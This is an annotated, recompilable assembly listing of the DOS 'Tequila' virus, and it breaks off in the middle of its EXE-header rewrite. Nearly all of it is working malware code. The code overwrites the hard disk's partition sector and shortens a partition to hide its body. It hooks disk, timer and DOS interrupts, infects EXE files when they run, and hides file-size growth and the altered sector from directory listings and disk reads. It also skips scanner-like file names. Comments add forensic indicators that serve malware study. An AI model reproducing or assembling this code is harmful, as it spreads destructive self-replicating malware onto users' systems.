
;=============================

; the tequila virus =


; a recompilable =
; dis-assembly =
; specifically designed =
; for assembly to a com file =
; with the a86 assembler. =
; ++++++++++++++++++ =
; if you desire a "perfect" =
; byte for byte source code =
;match-up, the masm assembler=
; must be used and the noted =
;instructions must be changed=
; to comply with masm syntax.=
; in addition, all byte and =
;word pointer references must=
; be changed from b and w to =
; byte pointer and word =
; pointer. =
;=============================

; single-segment image; the header comment says the listing is meant to
; assemble to a com file, which matches the origin of 100h below.
; number syntax: a86 reads a literal with a leading 0 as hexadecimal
; (org 0100 = 100h). NOTE(review): confirm against the a86 manual.
code_seg segment
assume cs:code_seg, ds:code_seg, es:code_seg, ss:code_seg
org 0100
tequila proc near

; jumps over the whole body to the booster at `start` near the end of the file.
jmp start

; data area. the code reads and writes it through small absolute offsets:
; w[6] and w[8] (stored date / countdown), b[0a] (flag used by
; new_interrupt_one), w[0b], w[0d], w[0f] and b[011] (multipliers/divisors).
; NOTE(review): which byte lands on which offset depends on the assembled
; size of the jmp above - check a listing file before relying on the mapping.
db 000, 000, 000, 000, 000, 000, 000, 0ffh, 0ffh


db 009, 005, 001h, 010h, 000, 000, 002h, 0fah, 000, 00ch

db 00dh, 00ah, 00dh, 00ah


; message text. print_message prints from offset 12h with dos function 9,
; which stops at the "$" terminator below.
; NOTE(review): these strings sit inside the range that
; perform_encryption_decryption transforms, so presumably they do not appear
; as plain text in an infected file - verify on a sample before using them
; as a file signature.
db "welcome to t.tequila's latest production.", 00dh, 00ah
db "contact t.tequila/p.o.box 543/6312 st'hausen/"
db "switzerland.", 00dh, 00ah
db "loving thoughts to l.i.n.d.a", 00dh, 00ah, 00dh, 00ah
db "beer and tequila forever !", 00dh, 00ah, 00dh, 00ah
db "$"

; 45-character prompt; program_termination_routine copies 2dh bytes from
; offset 0bbh to the screen, which presumably is this string.
db "execute: mov ax, fe03 / int 21. key to go on!"

; payload trigger and display. called from int_21_intercept when the
; intercepted function is 4ch (program terminate).
; state words: w[6] and w[8] are written by infect_partition_table with the
; year and the month/day of the dos date at infection time.
; all registers it uses are saved on entry and restored before the ret.
; NOTE(review): the numeric jump targets (0243h, 020dh, ...) are absolute
; addresses in the assembled image and their destination lines carry no
; labels in this listing, so the branch descriptions below are a best
; reading - confirm them with a listing file.
program_termination_routine:
push bp
mov bp,sp
; 0ch bytes of locals, addressed as [bp-2] .. [bp-0c] below.
sub sp,0ch
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
; ds = cs so the w[..] references reach the resident data.
push cs
pop ds
; w[6] = 0ffffh: inc wraps to zero and the first je is taken.
; w[6] = 0: w[8] is used as a countdown, decremented on each call.
; anything else: falls to the date comparison.
mov ax,w[6]
inc ax
je 0243h ;masm mod. needed
dec ax
jne 020dh ;masm mod. needed
dec w[8] ;masm mod. needed
jne 0243h ;masm mod. needed
jmp 0246h ;masm mod. needed
; dos function 2ah (get date): cx = year, dh = month, dl = day.
mov ah,02ah
call int_21
mov si,cx
mov cx,w[8]
; stored day of month against today's day of month.
cmp cl,dl
jne 022fh ;masm mod. needed
; (current year - stored year) * b[011] + current month, compared with
; stored month + 3.
mov ax,si
sub ax,w[6]
mul b[011h] ;masm mod. needed
add al,dh
add ch,3
cmp al,ch
jae 0237h ;masm mod. needed
; w[6] = 0ffffh is the value the first test above treats as "do nothing".
mov w[6],0ffffh ;masm mod. needed
jmp 0243h ;masm mod. needed
; arm the countdown: w[6] = 0 selects the countdown path, w[8] = 3 calls.
mov w[6],0 ;masm mod. needed
mov w[8],3 ;masm mod. needed
jmp 02df ;masm mod. needed
; display part. video segment 0b800h, or 0b000h when bits 4-5 of the
; equipment word returned by int 11h are both set.
mov bx,0b800h
int 011
and ax,030h
cmp ax,030h
jne 0256h ;masm mod. needed
mov bx,0b000h
mov es,bx
xor bx,bx
; two nested counters: di runs from 0fd8fh in steps of 34h while below
; 02a3h (signed), si runs from 0fc18h in steps of 12h while below 01b8h.
mov di,0fd8fh
mov si,0fc18h
mov w[bp-2],si
mov w[bp-4],di
; up to 1eh iterations per cell of a fixed-point square/add recurrence
; with an early exit on magnitude.
; NOTE(review): this looks like an escape-time fractal plot - confirm.
mov cx,01e
mov ax,w[bp-2]
imul ax
mov w[bp-8],ax
mov w[bp-6],dx
mov ax,w[bp-4]
imul ax
mov w[bp-0c],ax
mov w[bp-0a],dx
add ax,w[bp-8]
adc dx,w[bp-6]
cmp dx,0f
jae 02b0 ;masm mod. needed
mov ax,w[bp-2]
imul w[bp-4]
idiv w[0f] ;masm mod. needed
add ax,di
mov w[bp-4],ax
mov ax,w[bp-8]
mov dx,w[bp-6]
sub ax,w[bp-0c]
sbb dx,w[bp-0a]
idiv w[0d] ;masm mod. needed
add ax,si
mov w[bp-2],ax
loop 0269 ;masm mod. needed
; one screen cell: character 0dbh, attribute derived from the remaining
; iteration count.
inc cx
shr cl,1
mov ch,cl
mov cl,0db
es mov w[bx],cx ;masm mod. needed
inc bx
inc bx
add si,012
cmp si,01b8
jl 0260 ;masm mod. needed
add di,034
cmp di,02a3
jl 025d ;masm mod. needed
; copies 2dh bytes from ds:0bbh into every other byte of video memory
; (the character positions), starting at the top-left cell.
xor di,di
mov si,0bb
mov cx,02d
cld
movsb
inc di
loop 02d7 ;masm mod. needed
; int 16h with ah = 0: waits for a key press before returning.
xor ax,ax
int 016
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
mov sp,bp
pop bp
ret

; prints the "$"-terminated text at cs:12h with dos function 9.
; reached from int_21_intercept for ax = 0fe03h when w[6] is zero.
; preserves dx and ds; ah is overwritten.
print_message:
push dx
push ds
; ds = cs: function 9 takes the string address in ds:dx.
push cs
pop ds
mov ah,9
mov dx,012
; goes through int_21, i.e. the saved original vector, not the hook.
call int_21
pop ds
pop dx
ret

; boot-time loader in two parts.
; part 1 (up to the db lines) runs from 0:7c00h: it addresses its own data
; as w[07c30] and w[07c32]. infect_partition_table copies 34h bytes from
; offset 01f6h over the start of the sector buffer before writing
; cylinder 0, head 0, sector 1.
; NOTE(review): presumably those 34h bytes are part 1 plus the six db
; bytes - confirm the offsets with a listing file.
; indicators visible here for a responder:
;   - the bios memory size word at 0:0413h is lowered by 3 (kb);
;   - the six data bytes follow the code directly, the first word being
;     0fe02h, the value infect_partition_table tests at offset 2eh of the
;     sector it reads.
new_partition_table:
cli
xor bx,bx
mov ds,bx
mov ss,bx
mov sp,07c00
sti
xor di,di
; reserve memory at the top of conventional ram.
sub w[0413],3 ;masm mod. needed
; int 12h returns the (now reduced) size in kb; shifted left by 6 it
; becomes the segment of the reserved area.
int 012
mov cl,6
shl ax,cl
mov es,ax
; far return address es:022ah = part 2 inside the loaded copy.
push es
mov ax,022a
push ax
; int 13h function 2, 5 sectors, to es:bx with bx = 0. the start sector is
; one past the location stored in the data words below.
mov ax,0205
mov cx,w[07c30]
inc cx
mov dx,w[07c32]
int 013
retf

; marker word, then the cx and dx values of the sector that holds the saved
; original sector (read back as w[0226] and w[0228] in part 2).
; NOTE(review): the two location words are per-disk values; the ones
; printed here are whatever the disassembled sample contained.
db 002, 0fe
db 04c, 0e9
db 080, 004

; part 2, running in the reserved area. reads the saved original sector to
; 0:7c00h so the normal boot continues after the final retf.
push cs
pop ds
xor ax,ax
mov es,ax
mov bx,07c00
push es
push bx
mov ax,0201
mov cx,w[0226]
mov dx,w[0228]
int 013
; two block copies inside the resident segment: 46h bytes 0409h -> 09beh
; and 45h bytes 091bh -> 0a04h.
; NOTE(review): 09beh is the offset later installed as the int 13h
; handler and 0a04h is called by copy_to_high_memory_encrypt_write, so
; these look like relocated copies of new_interrupt_13 and
; make_the_disk_write onward - confirm.
push cs
pop es
cld
mov si,0409
mov di,09be
mov cx,046
rep movsb
mov si,091b
mov di,0a04
mov cx,045
rep movsb
cli
xor ax,ax
mov es,ax
; 0:70h is the int 1ch (timer tick) vector; the old value is kept in
; 09b0h/09b2h.
es les bx,[070] ;masm mod. needed
mov w[09b0],bx ;masm mod. needed
mov w[09b2],es ;masm mod. needed
mov es,ax
; 0:84h is the int 21h vector; a snapshot goes to 09b4h/09b6h so the
; timer hook can notice when it changes.
es les bx,[084] ;masm mod. needed
mov w[09b4],bx ;masm mod. needed
mov w[09b6],es ;masm mod. needed
mov es,ax
; int 1ch now points at offset 044fh in this segment.
es mov w[070],044f ;masm mod. needed
es mov w[072],ds ;masm mod. needed
sti
; far return to 0:7c00h (pushed above): the original boot sector runs.
retf
; entry code that runs when an infected program starts.
; what the visible code does: finds its own load offset, fixes up the saved
; host entry values, asks a resident copy whether it is present, and if
; not, copies itself to the top of the last memory block and calls
; infect_partition_table. it then jumps to the host program.
; no interrupt vector is changed in this routine.
; on entry es is used as the program's load segment (dos passes the psp
; segment in es for exe programs).
install:
; call/pop yields the run-time address of next_line; subtracting 028fh
; turns it into the base offset of the body.
call next_line
next_line:
pop si
sub si,028f
push si
push ax
push es
push cs
pop ds
; the words at base+2 and base+4 hold the host's code and stack segments
; as relative values; adding the load segment makes them absolute.
mov ax,es
add w[si+2],ax
add w[si+4],ax
; es - 1 is the memory control block of the program's own allocation.
dec ax
mov es,ax
; residency check: a resident copy answers ax = 0fe02h with ax = 01fdh
; (see check_for_previous_installation). useful as a memory indicator.
mov ax,0fe02
int 021
cmp ax,01fd
je no_partition_infection
; the block must be the last one in the chain (type byte 5ah) and larger
; than 0bbh paragraphs.
es cmp b[0],05a ;masm mod. needed
jne no_partition_infection
es cmp w[3],0bb ;masm mod. needed
jbe no_partition_infection
; the word at offset 12h from the block header (offset 2 of the psp) is
; the segment of the first byte past the allocation; 0bbh paragraphs
; below it is the copy destination.
es mov ax,w[012] ;masm mod. needed
sub ax,0bb
mov es,ax
xor di,di
; 09a4h bytes: the same constant the directory-listing code subtracts
; from reported file sizes.
mov cx,09a4
cld
rep movsb
push es
pop ds
call infect_partition_table
no_partition_infection:
pop es
pop ax
push es
pop ds
pop si
; restore the host's stack segment, then far-jump to the host entry
; point stored as a dword at the base offset.
cs mov ss,w[si+4] ;masm mod. needed
chain_to_the_host_file:
cs jmp d[si] ;masm mod. needed

; modifies the first hard disk (drive 80h) so the body loads at boot.
; sequence visible in the code:
;   1. record the dos date in w[6]/w[8];
;   2. find the int 13h entry point by single-stepping one disk read
;      (new_interrupt_one records the address in 09a0h/09a2h);
;   3. read cylinder 0, head 0, sector 1 and leave if the word at offset
;      2eh is already 0fe02h;
;   4. pick the first partition entry of type 1, 4 or 6, shorten it by 6
;      sectors, and use the freed sectors for the original sector and the
;      body;
;   5. write a new first sector.
; forensic indicators: marker 0fe02h at offset 2eh of the first sector, a
; partition entry whose sector count is 6 lower than expected, and a copy
; of the original first sector inside the last sectors of that partition.
; NOTE(review): numeric jump targets are unlabelled absolute addresses;
; `ret` used as a jump target is a86 shorthand for a nearby ret - confirm
; both with a listing file.
infect_partition_table:
; dos function 2ah: cx = year, dx = month/day.
mov ah,02a
int 021
mov w[6],cx ;masm mod. needed
mov w[8],dx ;masm mod. needed
; dos function 52h; the word at es:[bx-2] is stored at offset 03e8h.
; NOTE(review): 03e8h appears to fall inside new_interrupt_one, on the
; immediate of its `cmp w[bp+4],...` - i.e. this store patches that
; compare. confirm against the assembled offsets.
mov ah,052
int 021
es mov ax,w[bx-2] ;masm mod. needed
mov w[03e8],ax ;masm mod. needed
; current int 13h vector -> 09a0h/09a2h.
mov ax,03513
int 021
mov w[09a0],bx ;masm mod. needed
mov w[09a2],es ;masm mod. needed
; save the int 1 (single-step) vector in si/di and point it at cs:03dah.
mov ax,03501
int 021
mov si,bx
mov di,es
mov ax,02501
mov dx,03da
int 021
mov b[0a],0 ;masm mod. needed
; set the trap flag (bit 8 of flags).
pushf
pop ax
or ax,0100
push ax
popf
; read 1 sector from drive 80h, cylinder 0, head 0, sector 1 into
; ds:09a4h, through the int 13h vector, with single-stepping active.
mov ax,0201
mov bx,09a4
mov cx,1
mov dx,080
push ds
pop es
pushf
call d[09a0] ;masm mod. needed
; clear the trap flag and put the original int 1 vector back; the carry
; result of the read is kept across this by the extra pushf/popf.
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov ax,02501
mov dx,si
mov ds,di
int 021
popf
jae 0450 ;masm mod. needed
jmp ret ;masm mod. needed
push es
pop ds
; already-modified check on the sector just read.
cmp w[bx+02e],0fe02
jne 045c ;masm mod. needed
jmp ret ;masm mod. needed
; walk the four 10h-byte partition entries at offset 01beh and stop at the
; first whose type byte (entry+4) is 4, 6 or 1.
add bx,01be
mov cx,4
mov al,b[bx+4]
cmp al,4
je 0479 ;masm mod. needed
cmp al,6
je 0479 ;masm mod. needed
cmp al,1
je 0479 ;masm mod. needed
add bx,010
loop 0463 ;masm mod. needed
jmp short ret ;masm mod. needed
; entry+5 = ending head, entry+6 = ending sector/cylinder word.
mov dl,080
mov dh,b[bx+5]
mov w[0228],dx ;masm mod. needed
mov ax,w[bx+6]
mov cx,ax
mov si,6
; needs more than 6 sectors in the ending sector field.
and ax,03f
cmp ax,si
jbe ret ;masm mod. needed
sub cx,si
mov di,bx
inc cx
mov w[0226],cx ;masm mod. needed
; write the unmodified sector buffer (the original first sector) to the
; location just stored in w[0226]/w[0228].
mov ax,0301
mov bx,09a4
pushf
call d[09a0] ;masm mod. needed
jb ret ;masm mod. needed
; shorten the partition entry in the buffer: ending sector lowered, 32-bit
; sector count (entry+0ch) reduced by 6.
dec cx
mov w[di+6],cx
inc cx
sub w[di+0c],si
sbb w[di+0e],0
; write 5 sectors from ds:0 (the body) right after the saved sector.
mov ax,0305
mov bx,0
inc cx
pushf
call d[09a0] ;masm mod. needed
jb ret ;masm mod. needed
; overlay 34h bytes from offset 01f6h on the start of the sector buffer,
; then write the buffer to cylinder 0, head 0, sector 1.
mov si,01f6
mov di,09a4
mov cx,034
cld
rep movsb
mov ax,0301
mov bx,09a4
mov cx,1
xor dh,dh
pushf
call d[09a0] ;masm mod. needed
ret

; single-step (int 1) handler used while infect_partition_table issues one
; disk read with the trap flag set.
; stack on entry (after push bp): [bp+2] = ip, [bp+4] = cs, [bp+6] = flags
; of the instruction about to run.
; it stores one cs:ip pair in 09a0h/09a2h, sets b[0a] = 1, and clears the
; trap flag in the saved flags.
; NOTE(review): the comparison value 09b4h may be overwritten at run time
; by the store to offset 03e8h in infect_partition_table - confirm the
; offsets. jump targets are unlabelled absolute addresses.
; defender note: this handler only works while int 1 is delivered normally;
; a monitor that owns the single-step vector would see the vector change
; made by infect_partition_table.
new_interrupt_one:
push bp
mov bp,sp
; b[0a] = 1: an address has already been captured.
cs cmp b[0a],1 ;masm mod. needed
je 0506 ;masm mod. needed
; interrupted code segment above the limit: keep stepping.
cmp w[bp+4],09b4
ja 050b ;masm mod. needed
push ax
push es
; es:ax = interrupted cs:ip, recorded as the int 13h entry to call later.
les ax,[bp+2]
cs mov w[09a0],ax ;masm mod. needed
cs mov w[09a2],es ;masm mod. needed
cs mov b[0a],1
pop es
pop ax
; clear bit 8 (trap flag) in the flags image the iret will restore.
and w[bp+6],0feff
pop bp
iret

; int 13h filter that hides the modified first sector.
; it acts only on function 2 or 3 (read / write) with cx = 1 and dx = 80h,
; i.e. cylinder 0, head 0, sector 1 of the first hard disk; every other
; request goes to the saved handler unchanged.
; for a matching request the first sector transferred comes from / goes to
; the location in w[0226]/w[0228], which is where the original sector was
; saved, so a tool reading through int 13h while this is resident gets the
; original contents. reading the disk after booting from clean media
; avoids this filter.
; NOTE(review): jump targets are unlabelled absolute addresses; the final
; `cs jmp` is presumably the target of the early-out branches.
new_interrupt_13:
cmp cx,1
jne 054e ;masm mod. needed
cmp dx,080
jne 054e ;masm mod. needed
cmp ah,3
ja 054e ;masm mod. needed
cmp ah,2
jb 054e ;masm mod. needed
push cx
push dx
; al = sector count. for more than one sector, the remaining al-1 sectors
; are transferred normally, starting at sector 2 and 200h bytes into the
; caller's buffer.
dec al
je 0537 ;masm mod. needed
push ax
push bx
add bx,0200
inc cx
pushf
cs call d[09a0] ;masm mod. needed
pop bx
pop ax
; first sector: one sector at the saved location instead of sector 1.
mov al,1
cs mov cx,w[0226] ;masm mod. needed
cs mov dx,w[0228] ;masm mod. needed
pushf
cs call d[09a0] ;masm mod. needed
pop dx
pop cx
; return to the caller with the flags from the last call, discarding the
; flags word pushed by the int instruction.
retf 2
cs jmp d[09a0] ;masm mod. needed

; int 1ch hook installed at boot. on each tick it looks at the int 21h
; vector (0:84h). once that vector has a segment not above 0800h and
; differs from the snapshot in 09b4h/09b6h, it
;   - stores the new int 21h vector in 09b4h/09b6h,
;   - restores the original int 1ch vector from 09b0h/09b2h,
;   - saves the int 13h vector in 09a0h/09a2h and points int 13h at
;     cs:09beh,
;   - points int 21h at cs:04b1h.
; otherwise it returns without changes.
; memory indicator: int 13h and int 21h vectors pointing into the block at
; the top of conventional memory that the boot code reserved.
; NOTE(review): jump targets are unlabelled absolute addresses.
new_timer_tick_interrupt:
push ax
push bx
push es
push ds
xor ax,ax
mov es,ax
push cs
pop ds
; es:bx = current int 21h vector.
es les bx,[084] ;masm mod. needed
mov ax,es
cmp ax,0800
ja 05b0 ;masm mod. needed
cmp ax,w[09b6]
jne 0575 ;masm mod. needed
cmp bx,w[09b4]
je 05b0 ;masm mod. needed
mov w[09b4],bx ;masm mod. needed
mov w[09b6],es ;masm mod. needed
; ds = 0 from here: the w[..] stores below write the vector table.
xor ax,ax
mov ds,ax
cs les bx,[09b0] ;masm mod. needed
mov w[070],bx ;masm mod. needed
mov w[072],es ;masm mod. needed
les bx,[04c] ;masm mod. needed
cs mov w[09a0],bx ;masm mod. needed
cs mov w[09a2],es ;masm mod. needed
mov w[04c],09be ;masm mod. needed
mov w[04e],cs ;masm mod. needed
mov w[084],04b1 ;masm mod. needed
mov w[086],cs ;masm mod. needed
pop ds
pop es
pop bx
pop ax
iret

; resident int 21h dispatcher. requests it acts on:
;   ah = 11h, 12h  fcb find first/next  -> adjust_fcb_matches
;   ah = 4eh, 4fh  handle find first/next -> adjust_handle_matches
;   ax = 0fe02h    residency query: returns ax = 01fdh (not ax)
;   ax = 0fe03h    prints the message when w[6] is zero
;   ax = 4b00h     load and execute -> infect_the_file
;   ah = 4ch       terminate -> program_termination_routine
; everything else, and the 4b00h/4ch requests after their extra work, is
; passed to the saved int 21h vector at 09b4h.
; detection note: the 0fe02h -> 01fdh reply is an observable sign that the
; hook is in memory.
int_21_intercept:
cmp ah,011
jb check_for_handle
cmp ah,012
ja check_for_handle
call adjust_fcb_matches
; retf 2 keeps the flags produced by the real call instead of the ones
; pushed by the int instruction.
retf 2
check_for_handle:
cmp ah,04e
jb check_for_previous_installation
cmp ah,04f
ja check_for_previous_installation
call adjust_handle_matches
retf 2
check_for_previous_installation:
cmp ax,0fe02
jne check_for_message_print
not ax
iret
check_for_message_print:
cmp ax,0fe03
jne check_for_execute
cs cmp w[6],0 ;masm mod. needed
jne chain_to_true_int_21
call print_message
iret
check_for_execute:
cmp ax,04b00
je set_stack
cmp ah,04c
jne chain_to_true_int_21
set_stack:
; caller's ss:sp is parked in 09a6h/09a8h and a private stack at cs:0ae5h
; is used while the extra work runs; interrupts are off around each
; ss/sp switch.
cs mov w[09a6],sp ;masm mod. needed
cs mov w[09a8],ss ;masm mod. needed
cli
push cs
pop ss
mov sp,0ae5
sti
cmp ah,04c
jne to_an_infection
call program_termination_routine
jmp short no_infection
to_an_infection:
call infect_the_file
no_infection:
cli
cs mov ss,w[09a8] ;masm mod. needed
cs mov sp,w[09a6] ;masm mod. needed
sti
jmp short chain_to_true_int_21
chain_to_true_int_21:
; w[09bc] counts chained calls; encrypt_and_write_to_file uses its low
; five bits as an index.
cs inc w[09bc] ;masm mod. needed
cs jmp d[09b4] ;masm mod. needed
; int 24h (critical error) handler installed by infect_the_file for the
; duration of its file work: al = 3 tells dos to fail the call, so no
; error prompt is shown to the user.
new_critical_error_handler:
mov al,3
iret

; size hiding for fcb directory searches (int 21h ah = 11h / 12h).
; runs the real search, then, if the entry's time word has all five low
; bits set (seconds field = 1fh, the mark infect_the_file puts on files),
; subtracts 09a4h from the 32-bit size in the returned entry.
; consequence for a responder: while the hook is resident, directory
; listings show the pre-modification size; the time stamp's seconds field
; of 1fh is not a value a normal clock produces and can be checked from a
; clean boot.
; returns ax and flags from the real call; bx and es are preserved.
; NOTE(review): jump targets are unlabelled absolute addresses.
adjust_fcb_matches:
push bx
push es
push ax
; function 2fh: es:bx = current disk transfer area, where the search
; result will be placed.
mov ah,02f
call int_21
pop ax
pushf
cs call d[09b4] ;masm mod. needed
pushf
push ax
; al = 0ffh: no match, nothing to adjust.
cmp al,0ff
je 0664 ;masm mod. needed
; first byte 0ffh marks an extended fcb, whose fields start 7 bytes later.
es cmp b[bx],0ff ;masm mod. needed
jne 064f ;masm mod. needed
add bx,7
es mov al,b[bx+017] ;masm mod. needed
and al,01f
cmp al,01f
jne 0664 ;masm mod. needed
es sub w[bx+01d],09a4 ;masm mod. needed
es sbb w[bx+01f],0 ;masm mod. needed
pop ax
popf
pop es
pop bx
ret

; size hiding for handle directory searches (int 21h ah = 4eh / 4fh).
; same idea as adjust_fcb_matches with the find-first record layout: the
; time word is at offset 16h and the 32-bit size at offset 1ah of the disk
; transfer area. an entry whose seconds field is 1fh has 09a4h subtracted
; from its reported size.
; returns ax and flags from the real call; bx and es are preserved.
; NOTE(review): jump targets are unlabelled absolute addresses.
adjust_handle_matches:
push bx
push es
push ax
; function 2fh: es:bx = current disk transfer area.
mov ah,02f
call int_21
pop ax
pushf
cs call d[09b4] ;masm mod. needed
pushf
push ax
; carry set: the search failed, leave the record alone.
jb 0691 ;masm mod. needed
es mov al,b[bx+016] ;masm mod. needed
and al,01f
cmp al,01f
jne 0691 ;masm mod. needed
es sub w[bx+01a],09a4 ;masm mod. needed
es sbb w[bx+01c],0 ;masm mod. needed
pop ax
popf
pop es
pop bx
ret

; small file-i/o helpers that share code by falling through or jumping into
; one another. all of them end in int_21, which calls the saved int 21h
; vector at 09b4h directly (pushf + far call imitates an int instruction),
; so the requests do not pass through int_21_intercept again.
; NOTE(review): other routines call numeric addresses in this cluster
; (0696h, 069ah, 06a4h, 06a8h, 06adh, 06b4h); they are entry points part-way
; into these helpers. 06b4h is presumably the `cs mov bx,w[09a4]` line that
; loads the file handle - confirm with a listing file.

; ah = 40h (write), then joins the read helper's call sequence.
write_to_the_file:
mov ah,040
jmp 069c ;masm mod. needed

; ah = 3fh (read). on success ax becomes (bytes transferred - cx), i.e.
; zero when the full count was transferred.
read_from_the_file:
mov ah,03f
call 06b4 ;masm mod. needed
jb ret ;masm mod. needed
sub ax,cx
ret

; function 4202h with cx:dx = 0: seek to end; dos returns the position,
; which is the file length, in dx:ax.
move_to_end_of_file:
xor cx,cx
xor dx,dx
mov ax,04202
jmp 06b4 ;masm mod. needed

; function 4200h with cx:dx = 0: seek to start. falls through to load the
; handle saved in w[09a4] and issue the call.
move_to_beginning_of_file:
xor cx,cx
xor dx,dx
mov ax,04200
cs mov bx,w[09a4] ;masm mod. needed

int_21:
cli
pushf
cs call d[09b4] ;masm mod. needed
ret

; file-modification driver, called from int_21_intercept on ax = 4b00h
; (load and execute) with ds:dx = program path.
; steps visible in the code, each undone in reverse order on the way out:
;   - reject names flagged by check_letters_in_filename;
;   - replace the int 24h handler (old vector kept in 09b8h/09bah);
;   - save the file attributes in 09aah and clear them;
;   - open read/write, handle kept in 09a4h;
;   - save date (09ach) and time (09aeh);
;   - read 1ch header bytes to 0a49h and require the "mz" signature
;     (05a4dh), so only exe-format files are touched;
;   - skip files whose header word at offset 12h matches one of 20h words
;     at offset 0e8h, marking their time stamp instead;
;   - otherwise append via encrypt_and_write_to_file.
; observable side effects for monitoring: a read/write open plus attribute
; clear and restore on a program at the moment it is executed, and a time
; stamp whose seconds field becomes 1fh.
; all registers are preserved.
; NOTE(review): jump and call targets given as numbers are unlabelled
; absolute addresses - confirm with a listing file.
infect_the_file:
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
; carry set = name rejected.
call check_letters_in_filename
jae good_name
jmp bad_name

good_name:
push dx
push ds
push cs
pop ds

save_and_replace_critical_error_handler:
; function 3524h: get int 24h vector; function 2524h: set it to cs:052ah.
mov ax,03524
call int_21
mov w[09b8],bx ;masm mod. needed
mov w[09ba],es ;masm mod. needed
mov ax,02524
mov dx,052a
call int_21
pop ds
pop dx
save_and_replace_file_attribute:
; function 4300h: get attributes into cx.
mov ax,04300
call int_21
cs mov w[09aa],cx ;masm mod. needed
jae 06fe ;masm mod. needed
jmp restore_crit_handler
; function 4301h with cx = 0: clear all attributes (read-only included).
mov ax,04301
xor cx,cx
call int_21
jb 077c ;masm mod. needed

open_file_for_read_write:
mov ax,03d02
call int_21
jb 0771 ;masm mod. needed
push dx
push ds
push cs
pop ds
mov w[09a4],ax ;masm mod. needed

get_filedate:
; function 5700h: dx = date, cx = time.
mov ax,05700
call 06b4 ;masm mod. needed
jb 075c ;masm mod. needed
mov w[09ac],dx ;masm mod. needed
mov w[09ae],cx ;masm mod. needed

read_and_check_exe_header:
call 06ad ;masm mod. needed
mov dx,0a49
mov cx,01c
call 069a ;masm mod. needed
jb 075c ;masm mod. needed
push ds
pop es
mov di,0e8
mov cx,020
cmp w[0a49],05a4d ;masm mod. needed
jne 075c ;masm mod. needed
; header word at 0a5bh = header offset 12h. a match in the 20h-word table
; means "already processed": only the time mark is (re)applied.
mov ax,w[0a5b]
cld
repne scasw
jne 0754 ;masm mod. needed
or w[09ae],01f ;masm mod. needed
jmp 075c ;masm mod. needed
call read_past_end_of_file
jb 075c ;masm mod. needed
call encrypt_and_write_to_file

restore_altered_date:
; function 5701h: set date/time from the saved (possibly marked) values.
mov ax,05701
mov dx,w[09ac]
mov cx,w[09ae]
call 06b4 ;masm mod. needed

close_the_file:
mov ah,03e
call 06b4 ;masm mod. needed

restore_file_attribute:
pop ds
pop dx
mov ax,04301
cs mov cx,w[09aa] ;masm mod. needed
call int_21

restore_crit_handler:
mov ax,02524
cs lds dx,[09b8] ;masm mod. needed
call int_21

bad_name:
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
ret

; name filter. in: ds:dx = zero-terminated path. out: carry set if the path
; contains the byte pair 53h,43h ("sc") anywhere or the byte 56h ("v");
; carry clear otherwise. infect_the_file skips the file when carry is set.
; the comparison is against upper-case byte values only.
; NOTE(review): presumably meant to leave scanner-type programs alone -
; the source does not say. jump targets are unlabelled absolute addresses.
; clobbers ax, cx, si, di, es.
check_letters_in_filename:
push ds
pop es
mov di,dx
; length of the path including the terminator: scan for 0, then not cx.
mov cx,-1
xor al,al
cld
repne scasb
not cx
mov di,dx
; 04353h in memory order is 53h,43h.
mov ax,04353
mov si,cx
; word compare at every byte position (scasw advances 2, dec di backs
; up 1).
scasw
je 07b7 ;masm mod. needed
dec di
loop 07a5 ;masm mod. needed
mov cx,si
mov di,dx
mov al,056
repne scasb
je 07b7 ;masm mod. needed
clc
ret
stc
ret

; inspects the last bytes of the open file before anything is appended.
; seeks to 0ah bytes before the end (cx:dx = -0ah), reads 8 bytes to 0a65h,
; and checks for the words 0fdf0h and 0aac5h at the start of that read.
; when both match it seeks to 9 bytes before the end and writes 4 bytes
; taken from 0a6bh; when they do not match it returns with carry clear.
; NOTE(review): the source does not say what writes such a trailer; it
; looks like handling for data appended by another tool - confirm before
; documenting it as such. call/jump targets are unlabelled absolute
; addresses.
; returns carry set on an i/o error.
read_past_end_of_file:
mov cx,-1
mov dx,-0a
call 06a8 ;masm mod. needed
mov dx,0a65
mov cx,8
call 069a ;masm mod. needed
jb ret ;masm mod. needed
cmp w[0a65],0fdf0 ;masm mod. needed
jne 07f0 ;masm mod. needed
cmp w[0a67],0aac5 ;masm mod. needed
jne 07f0 ;masm mod. needed
mov cx,-1
mov dx,-9
call 06a8 ;masm mod. needed
mov dx,0a6b
mov cx,4
call 0696 ;masm mod. needed
ret
clc
ret

; header arithmetic and append for one exe file whose 1ch-byte header is in
; the buffer at 0a49h (bx points there).
; in outline:
;   - file length (from move_to_end_of_file) is compared with the size the
;     header claims (page count at +4 times w[0d]); files longer than that
;     are left alone;
;   - the original entry values are saved: ss+10h -> w[4], cs+10h -> w[2],
;     ip -> w[0];
;   - the header is rewritten: page count / last-page size for length +
;     09a4h, a new cs:ip derived from the old file length with 0960h added
;     to the offset, and 09bh added to the ss field;
;   - copy_to_high_memory_encrypt_write appends the body;
;   - the time stamp is marked (or 1fh) and header offset 12h receives one
;     of the 20h table words chosen by the low five bits of w[09bc];
;   - the new header is written at the start of the file.
; detection notes grounded in the above: file growth of exactly 09a4h
; bytes, entry point 0960h bytes into the appended data, seconds field
; 1fh, and a non-zero word at header offset 12h drawn from a 20h-entry
; table.
; NOTE(review): jump/call targets are unlabelled absolute addresses, and
; the table at 0e8h appears to overlap the code that follows the text
; strings - confirm with a listing file.
encrypt_and_write_to_file:
call move_to_end_of_file
; di:si = file length.
mov si,ax
mov di,dx
mov bx,0a49
mov ax,w[bx+4]
mul w[0d] ;masm mod. needed
sub ax,si
sbb dx,di
jae 080c ;masm mod. needed
jmp out_of_encrypt
; header size in paragraphs (+8) times w[0b], subtracted from the length:
; di:si = size of the load image.
mov ax,w[bx+8]
mul w[0b] ;masm mod. needed
sub si,ax
sbb di,dx
mov ax,w[bx+0e]
mov w[4],ax ;masm mod. needed
add w[4],010 ;masm mod. needed
mul w[0b] ;masm mod. needed
add ax,w[bx+010]
sub ax,si
sbb dx,di
jb 083c ;masm mod. needed
sub ax,080
sbb dx,0
jb ret ;masm mod. needed
add w[bx+0e],09b
mov ax,w[bx+016]
add ax,010
mov w[2],ax ;masm mod. needed
mov ax,w[bx+014]
mov w[0],ax ;masm mod. needed
call 06a4 ;masm mod. needed
; new length = old length + 09a4h, split into pages and remainder.
